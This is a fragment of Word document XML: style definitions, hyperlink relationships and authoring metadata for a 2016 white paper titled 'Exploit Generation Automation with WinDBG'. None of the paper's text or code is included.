    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00522848"/>
    <w:pPr>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CODE">
    <w:name w:val="CODE"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="000F60C1"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="FDF9F7" w:themeFill="background2"/>
      <w:spacing w:line="240" w:lineRule="exact"/>
      <w:ind w:left="450" w:right="4500" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Lucida Console" w:cstheme="minorBidi"/>
      <w:noProof/>
      <w:sz w:val="18"/>
      <w:lang w:val="af-Z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sdn.microsoft.com/en-US/windows/hardware/hh852363" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/downloads/windows/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pykd.codeplex.com/releases/view/614442"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csaby/Library/Containers/com.microsoft.Word/Data/Library/Caches/1038/TM10002076/Ce&#769;ges%20papi&#769;r.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fitzl.csaba@gmail.com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C6CD95-612D-3641-A506-C8604636D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Céges papír.dotx</Template>
  <TotalTime>68</TotalTime>
  <Pages>6</Pages>
  <Words>1272</Words>
  <Characters>7254</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Exploit Generation Automation with WinDBG</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8509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Exploit Generation Automation with WinDBG</dc:title>
  <dc:subject>White Paper</dc:subject>
  <dc:creator>Csaba Fitzl</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Csaba Fitzl</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-12T18:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-09-24T12:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>